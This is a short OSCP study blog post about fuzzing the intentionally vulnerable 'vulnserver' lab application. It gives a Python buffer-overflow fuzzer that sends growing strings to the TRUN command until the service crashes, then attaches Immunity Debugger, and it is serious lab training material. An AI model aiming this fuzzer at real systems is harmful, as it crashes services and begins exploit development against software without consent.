OSCP Security Technology - Fuzzing

OSCP Security Technology - Fuzzing

Download vulnserver from the grey corner website.

https://thegreycorner.com/vulnserver.html

image-20210626220551288

image-20210626221420321

Download immunity debugger from here.

https://www.immunityinc.com/products/debugger/

nc -nv 192.168.2.21 9999

Kali

image-20210626222939269

Vulserver

image-20210626223027069

nano fuzzer.py
chmod 777 fuzzer.py
./fuzzer.py

#!/usr/bin/python
import socket
import sys

buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200

for string in buffer:
    print "Fuzzing vulnserver with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + string))
    s.close()

Create and run the fuzzer script.

image-20210626223444708

The vulserver is crashed now.

image-20210626223512949

Debug and watch what will happen.

Install and open Immunity Debugger.

image-20210626225309897

Attach vulnserver.

image-20210626225448095

Run the debugger.

image-20210626225911421

Run the fuzzer.py script on Kali Linux again.

image-20210626230015566

The vulnserver is crashed and the debugger is paused.

image-20210626230135669

posted @ 2021-06-26 23:04  晨风_Eric  阅读(57)  评论(0编辑  收藏  举报